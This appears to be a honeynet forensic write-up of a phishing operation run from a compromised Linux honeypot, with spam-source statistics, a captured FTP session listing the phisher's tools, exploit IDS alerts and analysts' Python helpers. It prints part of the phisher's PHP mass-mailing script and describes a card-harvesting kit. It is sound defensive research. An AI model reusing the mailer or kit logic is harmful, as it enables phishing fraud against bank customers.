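    out = ["| Count | Source IP address range |", "|---|---|"]
    out += [f"| {n} | {p} |" for p, n in rows]
    return "\n".join(out)


# Constructed sample log: seven forwarded connections and one unrelated line.
SAMPLE_LOG = """\
2004-12-10 13:02:11 honeypot redir[4121]: connect from 203.186.17.4:3321 to 10.0.0.5:80
2004-12-10 13:02:40 honeypot redir[4121]: connect from 80.58.9.200:1049 to 10.0.0.5:80
2004-12-10 13:03:02 honeypot redir[4121]: connect from 203.186.99.1:4418 to 10.0.0.5:80
2004-12-10 13:03:10 honeypot kernel: eth0: link up, 100Mbps, full-duplex
2004-12-10 13:05:55 honeypot redir[4121]: connect from 213.42.8.8:1100 to 10.0.0.5:80
2004-12-10 13:06:12 honeypot redir[4121]: connect from 80.58.14.3:1050 to 10.0.0.5:80
2004-12-10 13:09:47 honeypot redir[4121]: connect from 203.186.17.4:3322 to 10.0.0.5:80
2004-12-10 13:11:30 honeypot redir[4121]: connect from 61.56.3.77:2201 to 10.0.0.5:80
"""

if __name__ == "__main__":
    rows = aggregate(SAMPLE_LOG.splitlines())
    print(f"{total(rows)} redirections")
    print(render(rows))
```

Counting per /16 rather than per address is what makes the table publishable: it shows which networks the spam run reached without identifying individual recipients.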
| Count | Source IP address range |
|---|---|
| 28 | 203.186.X |
| 16 | 80.58.X |
| 13 | 212.138.X |
| 12 | 195.175.X |
| 9 | 61.56.X |
| 9 | 213.42.X |
| 8 | 62.220.X |
| 8 | 200.141.X |
| 8 | 195.229.X |
| 7 | 200.207.X |
| 5 | 200.226.X |
| 5 | 200.171.X |
| 5 | 142.32.X |
| 5 | 133.11.X |
| 4 | 61.19.X |
| 4 | 219.249.X |
| 4 | 203.162.X |
| 4 | 203.113.X |
| 4 | 202.129.X |
| 4 | 201.6.X |
| 4 | 200.204.X |
| 3 | 82.129.X |
| 3 | 66.173.X |
| 3 | 65.214.X |
| 3 | 216.189.X |
| 3 | 212.0.X |
| 3 | 211.248.X |
| 3 | 202.175.X |
| 3 | 200.168.X |
| 3 | 200.153.X |
| 3 | 193.95.X |
| 3 | 193.188.X |
| 3 | 163.28.X |
| 2 | 81.192.X |
| 2 | 81.168.X |
| 2 | 81.116.X |
| 2 | 80.55.X |
| 2 | 80.53.X |
| 2 | 69.56.X |
| 2 | 68.167.X |
| 2 | 67.163.X |
| 2 | 66.6.X |
| 2 | 66.250.X |
| 2 | 66.207.X |
| 2 | 66.135.X |
| 2 | 64.139.X |
| 2 | 63.70.X |
| 2 | 61.220.X |
| 2 | 61.179.X |
| 2 | 61.131.X |
| 2 | 24.106.X |
| 2 | 219.148.X |
| 2 | 218.30.X |
| 2 | 217.166.X |
| 2 | 217.14.X |
| 2 | 216.37.X |
| 2 | 216.244.X |
| 2 | 216.108.X |
| 2 | 213.212.X |
| 2 | 212.165.X |
| 2 | 211.75.X |
| 2 | 210.95.X |
| 2 | 210.212.X |
| 2 | 210.193.X |
| 2 | 210.177.X |
| 2 | 208.59.X |
| 2 | 207.250.X |
| 2 | 203.87.X |
| 2 | 203.75.X |
| 2 | 203.233.X |
| 2 | 203.177.X |
| 2 | 203.154.X |
| 2 | 203.147.X |
| 2 | 202.157.X |
| 2 | 202.138.X |
| 2 | 200.68.X |
| 2 | 200.45.X |
| 2 | 200.247.X |
| 2 | 200.216.X |
| 2 | 200.206.X |
| 2 | 200.161.X |
| 2 | 200.14.X |
| 2 | 196.40.X |
| 2 | 195.92.X |
| 2 | 193.251.X |
| 2 | 168.143.X |
| 2 | 163.27.X |
| 2 | 148.244.X |
| 2 | 148.240.X |
| 2 | 12.154.X |
| 1 | 84.9.X |
| 1 | 84.114.X |
| 1 | 82.67.X |
| 1 | 82.194.X |
| 1 | 82.156.X |
| 1 | 82.144.X |
| 1 | 82.112.X |
| 1 | 82.108.X |
| 1 | 81.86.X |
| 1 | 81.193.X |
| 1 | 81.115.X |
| 1 | 80.65.X |
| 1 | 80.51.X |
| 1 | 80.48.X |
| 1 | 80.235.X |
| 1 | 80.191.X |
| 1 | 80.183.X |
| 1 | 80.178.X |
| 1 | 80.15.X |
| 1 | 80.13.X |
| 1 | 80.132.X |
| 1 | 80.108.X |
| 1 | 69.95.X |
| 1 | 69.8.X |
| 1 | 69.88.X |
| 1 | 69.76.X |
| 1 | 69.50.X |
| 1 | 69.26.X |
| 1 | 69.201.X |
| 1 | 68.9.X |
| 1 | 68.95.X |
| 1 | 68.81.X |
| 1 | 68.60.X |
| 1 | 68.255.X |
| 1 | 68.228.X |
| 1 | 68.169.X |
| 1 | 68.164.X |
| 1 | 68.163.X |
| 1 | 68.161.X |
| 1 | 68.153.X |
| 1 | 68.122.X |
| 1 | 68.120.X |
| 1 | 67.50.X |
| 1 | 67.162.X |
| 1 | 67.132.X |
| 1 | 67.10.X |
| 1 | 67.109.X |
| 1 | 67.101.X |
| 1 | 67.100.X |
| 1 | 66.95.X |
| 1 | 66.93.X |
| 1 | 66.8.X |
| 1 | 66.69.X |
| 1 | 66.56.X |
| 1 | 66.30.X |
| 1 | 66.255.X |
| 1 | 66.23.X |
| 1 | 66.228.X |
| 1 | 66.214.X |
| 1 | 66.201.X |
| 1 | 66.178.X |
| 1 | 66.159.X |
| 1 | 66.150.X |
| 1 | 66.147.X |
| 1 | 66.0.X |
| 1 | 65.75.X |
| 1 | 65.69.X |
| 1 | 65.33.X |
| 1 | 65.202.X |
| 1 | 65.198.X |
| 1 | 65.197.X |
| 1 | 65.166.X |
| 1 | 65.115.X |
| 1 | 65.113.X |
| 1 | 64.84.X |
| 1 | 64.7.X |
| 1 | 64.76.X |
| 1 | 64.5.X |
| 1 | 64.39.X |
| 1 | 64.31.X |
| 1 | 64.2.X |
| 1 | 64.26.X |
| 1 | 64.219.X |
| 1 | 64.217.X |
| 1 | 64.205.X |
| 1 | 64.198.X |
| 1 | 64.173.X |
| 1 | 64.167.X |
| 1 | 64.166.X |
| 1 | 64.145.X |
| 1 | 64.132.X |
| 1 | 64.12.X |
| 1 | 64.114.X |
| 1 | 64.105.X |
| 1 | 63.86.X |
| 1 | 63.245.X |
| 1 | 63.209.X |
| 1 | 63.171.X |
| 1 | 63.169.X |
| 1 | 63.167.X |
| 1 | 63.162.X |
| 1 | 63.145.X |
| 1 | 63.134.X |
| 1 | 62.69.X |
| 1 | 62.39.X |
| 1 | 62.252.X |
| 1 | 62.190.X |
| 1 | 62.103.X |
| 1 | 61.62.X |
| 1 | 61.241.X |
| 1 | 61.236.X |
| 1 | 61.222.X |
| 1 | 61.221.X |
| 1 | 61.219.X |
| 1 | 61.218.X |
| 1 | 61.206.X |
| 1 | 61.197.X |
| 1 | 61.17.X |
| 1 | 61.150.X |
| 1 | 61.145.X |
| 1 | 61.138.X |
| 1 | 4.7.X |
| 1 | 4.79.X |
| 1 | 4.60.X |
| 1 | 4.42.X |
| 1 | 4.239.X |
| 1 | 38.5.X |
| 1 | 38.118.X |
| 1 | 24.74.X |
| 1 | 24.28.X |
| 1 | 24.252.X |
| 1 | 24.242.X |
| 1 | 24.220.X |
| 1 | 24.217.X |
| 1 | 24.209.X |
| 1 | 24.175.X |
| 1 | 24.167.X |
| 1 | 24.140.X |
| 1 | 24.13.X |
| 1 | 24.129.X |
| 1 | 24.11.X |
| 1 | 24.117.X |
| 1 | 24.0.X |
| 1 | 222.51.X |
| 1 | 222.35.X |
| 1 | 222.111.X |
| 1 | 221.2.X |
| 1 | 221.142.X |
| 1 | 220.80.X |
| 1 | 220.65.X |
| 1 | 220.255.X |
| 1 | 220.244.X |
| 1 | 220.172.X |
| 1 | 220.135.X |
| 1 | 220.130.X |
| 1 | 219.93.X |
| 1 | 219.89.X |
| 1 | 219.239.X |
| 1 | 219.166.X |
| 1 | 219.163.X |
| 1 | 219.161.X |
| 1 | 219.147.X |
| 1 | 219.142.X |
| 1 | 219.137.X |
| 1 | 219.133.X |
| 1 | 218.93.X |
| 1 | 218.89.X |
| 1 | 218.76.X |
| 1 | 218.5.X |
| 1 | 218.56.X |
| 1 | 218.188.X |
| 1 | 218.157.X |
| 1 | 218.152.X |
| 1 | 218.145.X |
| 1 | 218.144.X |
| 1 | 218.108.X |
| 1 | 217.95.X |
| 1 | 217.84.X |
| 1 | 217.56.X |
| 1 | 217.33.X |
| 1 | 217.172.X |
| 1 | 217.167.X |
| 1 | 217.136.X |
| 1 | 217.128.X |
| 1 | 216.86.X |
| 1 | 216.77.X |
| 1 | 216.43.X |
| 1 | 216.253.X |
| 1 | 216.250.X |
| 1 | 216.246.X |
| 1 | 216.239.X |
| 1 | 216.221.X |
| 1 | 216.191.X |
| 1 | 216.190.X |
| 1 | 216.185.X |
| 1 | 216.161.X |
| 1 | 216.155.X |
| 1 | 216.154.X |
| 1 | 216.153.X |
| 1 | 216.144.X |
| 1 | 216.139.X |
| 1 | 216.135.X |
| 1 | 216.104.X |
| 1 | 213.81.X |
| 1 | 213.56.X |
| 1 | 213.3.X |
| 1 | 213.229.X |
| 1 | 213.199.X |
| 1 | 213.186.X |
| 1 | 213.172.X |
| 1 | 213.164.X |
| 1 | 213.157.X |
| 1 | 213.132.X |
| 1 | 213.121.X |
| 1 | 212.97.X |
| 1 | 212.95.X |
| 1 | 212.55.X |
| 1 | 212.37.X |
| 1 | 212.182.X |
| 1 | 212.112.X |
| 1 | 211.92.X |
| 1 | 211.72.X |
| 1 | 211.57.X |
| 1 | 211.46.X |
| 1 | 211.38.X |
| 1 | 211.251.X |
| 1 | 211.249.X |
| 1 | 211.241.X |
| 1 | 211.23.X |
| 1 | 211.22.X |
| 1 | 211.21.X |
| 1 | 211.184.X |
| 1 | 211.167.X |
| 1 | 211.114.X |
| 1 | 211.108.X |
| 1 | 210.93.X |
| 1 | 210.90.X |
| 1 | 210.83.X |
| 1 | 210.60.X |
| 1 | 210.249.X |
| 1 | 210.187.X |
| 1 | 210.150.X |
| 1 | 210.138.X |
| 1 | 210.104.X |
| 1 | 210.100.X |
| 1 | 210.0.X |
| 1 | 209.88.X |
| 1 | 209.63.X |
| 1 | 209.58.X |
| 1 | 209.250.X |
| 1 | 209.239.X |
| 1 | 209.232.X |
| 1 | 209.226.X |
| 1 | 209.205.X |
| 1 | 209.204.X |
| 1 | 209.195.X |
| 1 | 209.183.X |
| 1 | 209.173.X |
| 1 | 209.113.X |
| 1 | 208.63.X |
| 1 | 208.62.X |
| 1 | 208.42.X |
| 1 | 208.29.X |
| 1 | 208.232.X |
| 1 | 208.203.X |
| 1 | 208.19.X |
| 1 | 208.191.X |
| 1 | 208.190.X |
| 1 | 208.16.X |
| 1 | 208.153.X |
| 1 | 208.147.X |
| 1 | 207.6.X |
| 1 | 207.69.X |
| 1 | 207.44.X |
| 1 | 207.28.X |
| 1 | 207.233.X |
| 1 | 207.212.X |
| 1 | 207.192.X |
| 1 | 207.177.X |
| 1 | 207.152.X |
| 1 | 207.121.X |
| 1 | 207.109.X |
| 1 | 206.205.X |
| 1 | 206.173.X |
| 1 | 206.163.X |
| 1 | 205.208.X |
| 1 | 205.201.X |
| 1 | 205.188.X |
| 1 | 205.145.X |
| 1 | 204.69.X |
| 1 | 203.59.X |
| 1 | 203.51.X |
| 1 | 203.252.X |
| 1 | 203.208.X |
| 1 | 203.199.X |
| 1 | 203.195.X |
| 1 | 203.185.X |
| 1 | 203.172.X |
| 1 | 203.157.X |
| 1 | 203.151.X |
| 1 | 203.145.X |
| 1 | 203.131.X |
| 1 | 203.130.X |
| 1 | 203.121.X |
| 1 | 203.112.X |
| 1 | 203.10.X |
| 1 | 202.85.X |
| 1 | 202.67.X |
| 1 | 202.5.X |
| 1 | 202.58.X |
| 1 | 202.54.X |
| 1 | 202.47.X |
| 1 | 202.39.X |
| 1 | 202.216.X |
| 1 | 202.213.X |
| 1 | 202.174.X |
| 1 | 202.169.X |
| 1 | 202.162.X |
| 1 | 202.159.X |
| 1 | 202.155.X |
| 1 | 202.14.X |
| 1 | 202.130.X |
| 1 | 202.106.X |
| 1 | 201.3.X |
| 1 | 201.2.X |
| 1 | 201.225.X |
| 1 | 201.129.X |
| 1 | 200.87.X |
| 1 | 200.85.X |
| 1 | 200.59.X |
| 1 | 200.40.X |
| 1 | 200.30.X |
| 1 | 200.253.X |
| 1 | 200.251.X |
| 1 | 200.250.X |
| 1 | 200.228.X |
| 1 | 200.212.X |
| 1 | 200.203.X |
| 1 | 200.201.X |
| 1 | 200.182.X |
| 1 | 200.165.X |
| 1 | 200.163.X |
| 1 | 200.158.X |
| 1 | 200.144.X |
| 1 | 200.12.X |
| 1 | 200.119.X |
| 1 | 200.118.X |
| 1 | 200.114.X |
| 1 | 199.80.X |
| 1 | 199.246.X |
| 1 | 199.243.X |
| 1 | 199.203.X |
| 1 | 199.174.X |
| 1 | 198.81.X |
| 1 | 198.248.X |
| 1 | 198.173.X |
| 1 | 198.165.X |
| 1 | 196.33.X |
| 1 | 195.69.X |
| 1 | 195.68.X |
| 1 | 195.61.X |
| 1 | 195.56.X |
| 1 | 195.39.X |
| 1 | 195.222.X |
| 1 | 195.205.X |
| 1 | 195.117.X |
| 1 | 194.78.X |
| 1 | 194.243.X |
| 1 | 193.253.X |
| 1 | 193.170.X |
| 1 | 192.136.X |
| 1 | 192.115.X |
| 1 | 170.154.X |
| 1 | 168.234.X |
| 1 | 168.209.X |
| 1 | 166.114.X |
| 1 | 165.98.X |
| 1 | 165.21.X |
| 1 | 163.23.X |
| 1 | 163.20.X |
| 1 | 162.6.X |
| 1 | 162.39.X |
| 1 | 159.54.X |
| 1 | 158.130.X |
| 1 | 156.110.X |
| 1 | 155.212.X |
| 1 | 151.99.X |
| 1 | 151.195.X |
| 1 | 149.106.X |
| 1 | 148.223.X |
| 1 | 143.248.X |
| 1 | 142.179.X |
| 1 | 141.158.X |
| 1 | 140.131.X |
| 1 | 138.88.X |
| 1 | 137.204.X |
| 1 | 129.44.X |
| 1 | 128.200.X |
| 1 | 12.42.X |
| 1 | 12.176.X |
| 1 | 12.160.X |
| 1 | 12.147.X |
| 1 | 12.101.X |
Details about the UK compromise
This honeynet was a high interaction research honeynet deployed by the UK Honeynet Project in a UK ISP data centre. After a few hours of general background network activity, the Redhat Linux 7.3 honeypot was scanned, compromised and an IRC server installed. A number of further compromises occurred, as multiple attackers located the vulnerable system and exploited it for their own purposes, before the honeypot server was used to host a phishing attack targeting a well known US bank. For brevity, this detailed analysis of the uploaded content only covers the activity relevant to the phishing attack.
The first zip file downloaded was bank.zip, via wget from the Romanian FTP server host2.go.ro.
The file was a valid zip archive, and contained the following data:
This was a pre-prepared web site that mimics the official login page for a major US bank. It included a server side PHP script called check.php, intended to harvest any credentials entered by an unsuspecting end user and email them to the phisher. The presence of a Thumbs.db file suggests that the contents were prepared on a MS Windows system. Scrisoare is the Romanian word for letter, suggesting an email or message of Romanian origin.
Analysis of the check.php script (shown below) reveals that this script is a more advanced version of the script used in the German phishing incident. Basic checks on the card number received have been added, along with a refinement that uses the credit card number to classify cards into different types and insert the type into the subject line of the email. This suggests basic scripting abilities and not just a simple script kiddie.
The check.php script:
</html>
";
}
}
}
?>
A hard coded IP address of 66.XXX.XXX.XXX was included in the original script, suggesting that the script had already been used on an alternate server (either another compromised host or a test machine local to the attacker). This IP address appears to be a home DSL IP block belonging to a US carrier and no web site is hosted there now. This script also links directly to the real target bank web site, presumably for added realism and to attempt to confuse recipients.
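As an added illustration of the checks the text describes (the page only shows the tail of check.php, and this is not the phisher's script), the following Python applies a Luhn mod-10 check and classifies a number by issuer prefix and length; the prefix table is a simplified subset of the public IIN assignments, assumed here for illustration. Reading this kind of logic in a recovered kit tells an analyst which fields the phisher validates and therefore which data they are after.

```python
# Added example: the kind of card-number validation and classification the
# text says check.php performs. Illustrative Python, not the recovered PHP.
# The prefix/length table is a simplified subset of public IIN assignments,
# assumed here for illustration only.

def luhn_ok(digits: str) -> bool:
    """Return True if the digit string passes the Luhn mod-10 check."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def classify_card(raw: str):
    """Normalise a submitted card number and classify it by prefix and length.

    Returns "Visa", "MasterCard", "Amex" or "Discover", or None when the
    input fails the basic checks (wrong length or Luhn failure). Spaces and
    dashes typed by the victim are stripped first, as a kit would do.
    """
    digits = "".join(ch for ch in raw if ch.isdigit())
    if len(digits) not in (13, 15, 16) or not luhn_ok(digits):
        return None
    two = int(digits[:2])
    if digits[0] == "4" and len(digits) in (13, 16):
        return "Visa"
    if 51 <= two <= 55 and len(digits) == 16:
        return "MasterCard"
    if two in (34, 37) and len(digits) == 15:
        return "Amex"
    if digits.startswith("6011") and len(digits) == 16:
        return "Discover"
    return None
```

The Luhn check only catches typos, not fraud; a kit that includes it is filtering out mistyped submissions so that the phisher's inbox contains mostly usable data, which is why its presence is a marker of a more careful operator.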
The second file downloaded using FTP was bank1.tgz:
The file was a valid tgz archive, and contained the following data:
The attacker moved the new files into location in the web root and used the pico editor to change popup.html to point to a test server (http://69.24.XX.XX/testing.php). Again, this was possibly a previously compromised host or a system local to the attacker.
Interestingly, because this FTP session was plain text and the attacker helpfully used the directory listing command, we can observe the attacker's activities and also see what other tools they have stored in their FTP area. Directory listings are often very useful in providing further background detail during incident analysis:
USER xxxxxxxxx
331 Password required for phiser.
PASS xxxxxxxxx
230 User phisher logged in.
SYST
215 UNIX Type: L8
PASV
227 Entering Passive Mode (81,196,XXX,XXX,99,226).
LIST
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 free web 1890 Jun 16 01:03 Desktop.zip
-rw-r--r-- 1 free web 6536 Jul 19 11:26 Scrisori.zip
-rw-r--r-- 1 free web 2788 Jun 16 18:29 bla1.txt
-rw-r--r-- 1 free web 14834 Jun 17 13:16 ebay only
-rw-r--r-- 1 free web 247127 Jun 14 19:58 emailer2.zip
-rw-r--r-- 1 free web 467214 Jun 10 08:36 eros.tgz
-rw-r--r-- 1 free web 417494 Jul 18 22:27 ex.tgz
-rw-r--r-- 1 free web 2833 Jul 11 16:55 flit.tgz
-rw-r--r-- 1 free web 7517 Jun 11 11:53 html1.zip
-rw-r--r-- 1 free web 10383 Jul 3 19:07 index.html
-rw-r--r-- 1 free web 413 Jul 18 22:09 index.zip
drwxr-xr-x 2 free web 54 Jul 11 04:49 listz
-rw-r--r-- 1 free web 246920 Jun 14 20:38 massmail.tgz
-rw-r--r-- 1 free web 8192 Jun 12 07:18 massmail.zip
-rw-r--r-- 1 free web 0 Jun 17 10:09 neptun.tgz
-rw-r--r-- 1 free web 310132 Jun 11 09:25 paginabuna1.tgz
-rw-r--r-- 1 free web 54818 Jun 18 23:24 scampagededat1.zip
-rw-r--r-- 1 free web 12163 Jun 9 01:31 send.php
-rw-r--r-- 1 free web 2094 Jun 20 11:49 sendspamAOL1.tgz
-rw-r--r-- 1 free web 2173 Jun 14 22:58 sendspamBUN1.tgz
-rw-r--r-- 1 free web 2783 Jun 15 00:21 sendspamBUNzip1.zip
-rw-r--r-- 1 free web 2096 Jun 16 18:46 sendspamNEW1.tgz
-rw-r--r-- 1 free web 574 Jul 11 01:08 sendbank1.tgz
-rw-r--r-- 1 free web 3238 Jul 18 23:07 sendbankNEW.tgz
-rw-r--r-- 1 free web 64443 Jun 11 02:33 spam
-rw-r--r-- 1 free web 83862 Jun 9 09:56 spamz.zip
drwxr-xr-x 2 free web 64 Jul 16 12:05 stuff
-rw-r--r-- 1 free web 2424 Jul 19 11:27 suntrust.zip
-rw-r--r-- 1 free web 36441 Jul 18 00:52 usNEW.zip
-rw-r--r-- 1 free web 36065 Jul 11 17:04 bank1.tgz
drwxr-xr-x 2 free web 49 Jul 16 12:26 banka
-rw-r--r-- 1 free web 301939 Jun 8 13:17 www1.tar.gz
-rw-r--r-- 1 free web 327380 Jun 7 16:24 www1.zip
226 Transfer complete.
CWD banka
250 CWD command successful.
PASV
227 Entering Passive Mode (81,196,XXX,XXX,115,151).
LIST
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 free web 1765 Jul 3 18:25 check.php
-rw-r--r-- 1 free web 39988 Jul 3 18:25 bank.zip
-rw-r--r-- 1 free web 40152 Jul 16 12:26 banka.zip
226 Transfer complete.
CWD ..
250 CWD command successful.
PASV
227 Entering Passive Mode (81,196,XXX,XXX,133,197).
LIST
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 free web 1890 Jun 16 01:03 Desktop.zip
-rw-r--r-- 1 free web 6536 Jul 19 11:26 Scrisori.zip
-rw-r--r-- 1 free web 2788 Jun 16 18:29 bla1.txt
-rw-r--r-- 1 free web 14834 Jun 17 13:16 ebay only
-rw-r--r-- 1 free web 247127 Jun 14 19:58 emailer2.zip
-rw-r--r-- 1 free web 467214 Jun 10 08:36 eros.tgz
-rw-r--r-- 1 free web 417494 Jul 18 22:27 ex.tgz
-rw-r--r-- 1 free web 2833 Jul 11 16:55 flit.tgz
-rw-r--r-- 1 free web 7517 Jun 11 11:53 html1.zip
-rw-r--r-- 1 free web 10383 Jul 3 19:07 index.html
-rw-r--r-- 1 free web 413 Jul 18 22:09 index.zip
drwxr-xr-x 2 free web 54 Jul 11 04:49 listz
-rw-r--r-- 1 free web 246920 Jun 14 20:38 massmail.tgz
-rw-r--r-- 1 free web 8192 Jun 12 07:18 massmail.zip
-rw-r--r-- 1 free web 0 Jun 17 10:09 neptun.tgz
-rw-r--r-- 1 free web 310132 Jun 11 09:25 paginabuna1.tgz
-rw-r--r-- 1 free web 54818 Jun 18 23:24 scampagededat1.zip
-rw-r--r-- 1 free web 12163 Jun 9 01:31 send.php
-rw-r--r-- 1 free web 2094 Jun 20 11:49 sendspamAOL1.tgz
-rw-r--r-- 1 free web 2173 Jun 14 22:58 sendspamBUN1.tgz
-rw-r--r-- 1 free web 2783 Jun 15 00:21 sendspamBUNzip1.zip
-rw-r--r-- 1 free web 2096 Jun 16 18:46 sendspamNEW1.tgz
-rw-r--r-- 1 free web 1574 Jul 11 01:08 sendbank1.tgz
-rw-r--r-- 1 free web 2238 Jul 18 23:07 sendbankNEW.tgz
-rw-r--r-- 1 free web 64443 Jun 11 02:33 spam
-rw-r--r-- 1 free web 83862 Jun 9 09:56 spamz.zip
drwxr-xr-x 2 free web 64 Jul 16 12:05 stuff
-rw-r--r-- 1 free web 2424 Jul 19 11:27 suntrust.zip
-rw-r--r-- 1 free web 36441 Jul 18 00:52 usNEW.zip
-rw-r--r-- 1 free web 36065 Jul 11 17:04 bank1.tgz
drwxr-xr-x 2 free web 49 Jul 16 12:26 banka
-rw-r--r-- 1 free web 301939 Jun 8 13:17 www1.tar.gz
-rw-r--r-- 1 free web 327380 Jun 7 16:24 www1.zip
226 Transfer complete.
TYPE I
200 Type set to I
PASV
227 Entering Passive Mode (81,196,XXX,XXX,113,86).
RETR bank1.tgz
150 Opening BINARY mode data connection for bank1.tgz (36065 bytes)
226 Transfer complete.
QUIT
221 Goodbye.
The contents of this FTP server home directory suggest that the phisher is heavily involved in spam and phishing activities, with pre-built content and message delivery tools targeting many well known online brands stored on this server. Based on this captured session, this phishing activity is not likely to be an isolated incident.
The third file downloaded was sendbankNEW.tgz from the Romanian FTP server host2.go.ro.
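To turn a capture like the one above into an inventory, the following Python (an added example, not part of the original analysis) parses the plaintext FTP control channel: it decodes PASV replies into host and port, tracks CWD so that LIST entries are attributed to the right directory, and recovers the login name from the server's 230 reply even where the client's USER line has been redacted. The sample session is a constructed excerpt in the same shape as the capture above, not the original packet data.

```python
import posixpath
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed excerpt in the shape of the captured control channel (commands
# as typed, numeric server replies, LIST entries). Not the honeynet's capture.
SAMPLE_SESSION = """\
USER xxxxxxxxx
331 Password required for phisher.
PASS xxxxxxxxx
230 User phisher logged in.
PASV
227 Entering Passive Mode (81,196,XXX,XXX,99,226).
LIST
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 free web 14834 Jun 17 13:16 ebay only
-rw-r--r-- 1 free web 246920 Jun 14 20:38 massmail.tgz
-rw-r--r-- 1 free web 36065 Jul 11 17:04 bank1.tgz
drwxr-xr-x 2 free web 49 Jul 16 12:26 banka
226 Transfer complete.
CWD banka
250 CWD command successful.
PASV
227 Entering Passive Mode (81,196,XXX,XXX,115,151).
LIST
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 free web 1765 Jul 3 18:25 check.php
226 Transfer complete.
CWD ..
250 CWD command successful.
TYPE I
200 Type set to I
PASV
227 Entering Passive Mode (81,196,XXX,XXX,113,86).
RETR bank1.tgz
150 Opening BINARY mode data connection for bank1.tgz (36065 bytes)
226 Transfer complete.
QUIT
221 Goodbye.
"""

# Unix-style LIST line: perms links owner group size mtime name (name may contain spaces)
LIST_RE = re.compile(r"^([-dl][rwxstT-]{9})\s+\d+\s+\S+\s+\S+\s+(\d+)\s+"
                     r"(\w{3}\s+\d{1,2}\s+(?:\d{2}:\d{2}|\d{4}))\s+(.+)$")
PASV_RE = re.compile(r"^227 .*?\(([^)]+)\)")
LOGIN_RE = re.compile(r"^230 User (\S+) logged in")


@dataclass
class FtpSession:
    user: Optional[str] = None
    cwd: str = "/"
    data_endpoints: list = field(default_factory=list)  # (host, port) decoded from 227 replies
    listings: dict = field(default_factory=dict)        # directory -> [(name, size, mtime, is_dir)]
    retrieved: list = field(default_factory=list)       # full paths handed to RETR


def pasv_endpoint(reply: str):
    """Decode a 227 reply: h1,h2,h3,h4,p1,p2 -> ("h1.h2.h3.h4", p1*256 + p2).
    Redacted octets ("XXX") are kept verbatim; the data port is still recoverable."""
    m = PASV_RE.match(reply)
    if not m:
        return None
    parts = [p.strip() for p in m.group(1).split(",")]
    if len(parts) != 6:
        return None
    return ".".join(parts[:4]), int(parts[4]) * 256 + int(parts[5])


def parse_ftp_transcript(text: str) -> FtpSession:
    s = FtpSession()
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line:
            continue
        if line[:3].isdigit() and (len(line) == 3 or line[3] in " -"):
            # Server reply. Replies can leak what the client side redacts:
            # the real login name is taken from the 230 line here.
            ep = pasv_endpoint(line)
            if ep:
                s.data_endpoints.append(ep)
            lg = LOGIN_RE.match(line)
            if lg:
                s.user = lg.group(1)
            continue
        m = LIST_RE.match(line)
        if m:
            perms, size, mtime, name = m.groups()
            s.listings.setdefault(s.cwd, []).append((name, int(size), mtime, perms[0] == "d"))
            continue
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "CWD":
            s.cwd = posixpath.normpath(posixpath.join(s.cwd, arg))
        elif verb == "RETR":
            s.retrieved.append(posixpath.join(s.cwd, arg))
    return s


def inventory(s: FtpSession):
    """Flatten every LIST seen into (path, size) for files, largest first:
    a quick view of what tooling the account holds."""
    files = []
    for d, entries in s.listings.items():
        for name, size, _mtime, is_dir in entries:
            if not is_dir:
                files.append((posixpath.join(d, name), size))
    return sorted(files, key=lambda t: -t[1])
```

The PASV decoding is worth keeping to hand: the data-channel port is chosen by the server per transfer, so when matching control-channel commands to the data streams in a packet capture the only link is the host:port pair encoded in the 227 reply.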
The file was a valid archive and contained the following files:
The purpose of each file is listed in the table below:
| File | Contents and purpose |
| ini.inc | Spam sending configuration |
| list.txt | This file contained a list of 5 email addresses to send spam email to. Because of the limited size and Romanian email addresses linked to the attacker, this was presumably the email addresses of fellow gang members and not a real phishing attack |
| bank.php | A simple PHP script to read the contents of a text file (bla.txt) and email it to each recipient in an input file (list.txt) |
The email lure bla.txt was notable for having good grammar and spelling, legalese at the bottom about "Equal Opportunity Lending" and heavy use of files linked directly from the official web site of the targeted bank, all of which help it to appear more realistic. One ironic point to note is that the email even included an exhortation not to provide passwords to fraudulent web sites, or to ever email your password to a third party!
The bank.php mass emailing script to send spam advertising this particular phishing scam is shown below:
XXXXXXXXX<restore@targetbank.com>\n";
$mail_header .= "Content-Type: text/html\n";
$subject="In attention of Target Bank Members ! Restore Your Account Now!";
$body=loadini("bla.txt");
if (!($fp = fopen("list.txt", "r")))
exit("Unable to open $listFile.");
$i=0;
print "Start time is "; print date("Y:m:d H:i"); print "\n";
while (!feof($fp)) {
fscanf($fp, "%s", $name);
$i++;
mail($name, $subject, $body, $mail_header);
}
print "End time is "; print date("Y:m:d H:i"); print "\n";
print "$i"; print "emails sent."; print"\n";
?>
Although simple, it is functional and could easily have been used to send many more messages than the 5 test messages sent from the honeynet. The honeynet architecture would have restricted outbound emails, but the honeypot was taken offline for forensic analysis before any bulk spam email could be sent by the attacker.
This honeynet was a high interaction research honeynet deployed by the UK Honeynet Project in a UK ISP data centre. After a few hours of general background network activity, the Redhat Linux 7.3 honeypot was scanned, compromised and an IRC server installed. A number of further compromises occurred, as multiple attackers located the vulnerable system and exploited it for their own purposes, before the honeypot server was used to host a phishing attack targeting a well known US bank. For brevity, this detailed timeline only covers the activity relevant to the phishing attack.
Detailed timeline:
18/07/04 - 12:30. First the attacker exploits a buffer overflow in the samba server on the Redhat Linux 7.3 honeypot, as can be seen from the snort alerts shown below:
[**] [1:648:7] SHELLCODE x86 NOOP [**]
[Classification: Executable code was detected] [Priority: 1]
07/18-12:30:37.817422 69.44.XXX.XXX:47938 -> 10.2.2.120:139
TCP TTL:53 TOS:0x0 ID:29659 IpLen:20 DgmLen:1500 DF
***AP*** Seq: 0x476AC788 Ack: 0x2E249707 Win: 0xB68 TcpLen: 32
TCP Options (3) => NOP NOP TS: 214020820 6062617
[Xref => http://www.whitehats.com/info/IDS181]
18/07/04 - 12:30. After a few retries with different offsets, the samba exploit (CAN-2003-0201) succeeds and returns a root prompt to the attacker, as shown by the snort alert below:
***AP*** Seq: 0x2E1F5FBE Ack: 0x47D426D5 Win: 0x16A0 TcpLen: 32
TCP Options (3) => NOP NOP TS: 6064395 214022589
